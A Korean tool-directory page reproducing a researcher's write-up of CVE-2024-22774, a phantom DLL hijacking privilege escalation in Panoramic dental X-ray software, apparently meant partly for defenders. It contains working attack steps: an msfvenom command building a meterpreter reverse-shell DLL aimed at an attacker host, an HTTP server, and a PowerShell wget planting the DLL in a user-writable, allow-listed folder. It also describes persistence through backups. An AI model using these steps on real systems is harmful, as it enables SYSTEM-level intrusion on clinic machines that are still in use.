Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-22774 — 파노라마 치과 영상 소프트웨어 은밀한 권한 상승 취약점 | Kitploit
도구/GitHubGitHub/gray-0men/cve-2024-22774
Privilege EscalationPayload GenerationPersistence MechanismsVulnerability AnalysisExploitationMalware AnalysisPenetration TestingRed TeamingBinary Exploitation
GitHubgray-0men/cve-2024-22774

CVE-2024-22774

파노라마 치과 영상 소프트웨어 은밀한 권한 상승 취약점

12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

파노라마 치과 영상 소프트웨어 9.1.2.7600. 팬텀 DLL 하이재킹 권한 상승 (CVE-2024-22774)

목차

  • 목차
  • 소개
  • 소프트웨어 최종 버전
  • 하이재킹 가능한 DLL 찾기
  • 공격 설정
  • 익스플로잇
  • OS 설치 후 지속성

소개

원래 이 글은 일부 치과 엑스레이 장비 소프트웨어의 DLL 프록시에 관한 분석 글이 될 예정이었습니다. 그런데 연구 중에 우연히 발견한 DLL 때문에 다시 확인하게 되었고, 결국 권한 상승 취약점을 발견하여 CVE를 받게 되었습니다. 제 기술 경력 초기에, 저는 한 치과 엑스레이 장비 제조업체가 문을 닫기 전까지 그곳에서 기술 지원을 했었습니다. 그곳에서 일하면서 발생했던 버그들을 기억하고 있었고, 그 소프트웨어에서 취약점을 찾아보는 것이 좋은 아이디어가 될 거라고 항상 생각했습니다. 그 소프트웨어가 아직도 사용되고 있는 만큼, 이제 소프트웨어 지원 업무에서 벗어난 지금 뭔가 멋진 일을 해볼 수 있는지 확인해 보기로 했습니다. 예전에 사이버 보안 공부 초기에 그 소프트웨어에서 하이재킹 가능한 매력적인 DLL 몇 개를 발견했던 기억이 났습니다. 그래서 DLL 프록시를 시도해서 그 소프트웨어를 정상 작동시키면서 악성 DLL을 실행할 수 있는지(정말 은밀하게) 확인해 보기로 했습니다. 아래는 제가 수행한 과정과, 이론적으로 OS를 완전히 초기화하고 재설치한 후에도 생존할 수 있는 권한 상승 취약점을 우연히 발견하게 된 경위입니다. 블루 팀에게 유용한 정보가 되길 바랍니다.

소프트웨어 최종 버전

한 가지 주의할 점은 이 소프트웨어가 더 이상 업데이트를 받지 않지만, 미국 전역에서 아직도 그 엑스레이 장비들이 사용 중이라는 것입니다. 따라서 이 취약점에는 여전히 잠재적 위험이 있습니다. 소프트웨어는 여기에서 다운로드할 수 있고, 소프트웨어 매뉴얼은 여기에서 확인할 수 있습니다. 또 한 가지 주의할 점은 이 소프트웨어가 사용 중이라면, 실행되는 프로세스와 다음 위치들이 사용 중인 ERD/AV에서 허용 목록에 등록되어 있을 확률이 99%라는 것입니다. 이는 소프트웨어 매뉴얼 24페이지에도 언급되어 있습니다. 이 분석 글에서도 동일하게 이러한 예외 항목을 추가하여 이 소프트웨어가 모든 치과에 설치되는 방식과 동일하게 구성하겠습니다.

  1. C:\Program Files (x86)\Panoramic
  2. C:\ProgramData\Ajat

image

하이재킹 가능한 DLL 찾기

소프트웨어가 설치되고 예외 항목이 추가되면 Process Monitor를 실행하고 검색을 시작합니다. 다음 필터를 추가하고 서비스에서 "CCS Service"를 다시 시작합니다:

  1. Process Name is ccsservice.exe then Include
  2. Path ends with .dll then Include

목록이 채워지면 이 소프트웨어에 하이재킹 가능한 DLL이 많이 있다는 것을 알 수 있습니다. 동일한 DLL에 대해 "NAME NOT FOUND" 결과가 여럿 표시되고, 바로 뒤이어 다른 위치에서 해당 DLL에 대한 "SUCCESS"가 표시되는 것을 볼 수 있습니다. 어느 날 프록시를 시도할 만한 적절한 DLL을 찾기 위해 목록을 스크롤하고 있었는데, 맨 아래 거의 끝부분에서 눈에 띄는 무언가가 있었습니다...

image

설마?? 맞습니다. 이는 사용자가 쓰기 가능한 위치에서 SYSTEM 무결성으로 호출되는 팬텀 DLL입니다. 본질적으로 이것은 머신 어딘가에 실제 DLL이 없기 때문에 프록시에 적합하지 않은 DLL입니다. Windows는 미리 정의된 폴더 집합에서 특정 순서로 DLL을 호출하려고 시도합니다.

  1. 애플리케이션이 로드된 디렉터리
  2. 시스템 디렉터리
  3. 16비트 시스템 디렉터리
  4. Windows 디렉터리
  5. 현재 디렉터리
  6. PATH 환경 변수에 나열된 디렉터리

그리고 이 시나리오에서 5번째 위치는 C:\ProgramData\Ajat\panoramic\datastor\lnrdlib.dll이며, 이 위치에는 모든 사용자에게 읽기, 쓰기, 실행 권한이 있습니다. 게다가 이 위치는 C:\ProgramData\Ajat\의 하위 폴더이므로, 이 소프트웨어가 사용되는 모든 환경에서 허용 목록에 등록되어 있을 것입니다.

image

공격 설정

이 테스트를 위한 네트워크 구성은 다음과 같습니다:

  • Kali - 10.0.1.137
  • Windows 10 64x - 10.0.1.128

AV에 대해 크게 걱정할 필요가 없으므로 간단한 기본 meterpreter DLL을 만드는 것으로 시작하겠습니다. 그런 다음 전송을 위해 http 서버를 실행합니다.

root@kitploit:~
## msfvenom to make dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.137 LPORT=443 -f dll > lnrdlib.dll

## python http server
python3 -m http.server 80

다시 Windows로 돌아와서 표준 사용자 계정으로 전환하고 PowerShell을 연 다음 해당 datastor 폴더로 이동하여 다음을 실행합니다: wget http://10.0.1.137/lnrdlib.dll -outfile lnrdlib.dll

image

익스플로잇

모든 것이 올바르게 수행되었다면 익스플로잇을 트리거하기 위해 컴퓨터를 다시 시작하기만 하면 됩니다(일반 사용자가 할 수 있는 일이므로, CCS Service를 다시 시작해도 이 문제가 트리거됩니다).

image

성공!!!

OS 설치 후 지속성

이제 datastor 위치의 핵심 사항 중 하나는, 어떤 이유로든 컴퓨터를 초기화하거나 교체해야 하고 소프트웨어를 재설치해야 할 경우 백업해야 하는 두 위치 중 하나라는 것입니다. calib 폴더의 내용이 손실되면 기술자가 출장 나와서 엑스레이 장비를 다시 보정해야 그 내용을 복구할 수 있습니다. datastor 파일이 손실되면 아직 저장되지 않은 최신 엑스레이 이미지를 잃게 되므로 이 위치는 백업이 다소 선택적입니다. 이 위치는 악성코드가 상주하게 되는 곳이므로, 악성코드와 최근 촬영한 엑스레이 이미지가 모두 들어 있는 백업된 datastor의 내용을 새 컴퓨터에 복원할 경우 누군가가 실수로 컴퓨터를 악성코드에 다시 감염시킬 가능성이 이론적으로 존재합니다. 이는 소프트웨어 매뉴얼 2페이지에 언급되어 있습니다.

image

도구 다운로드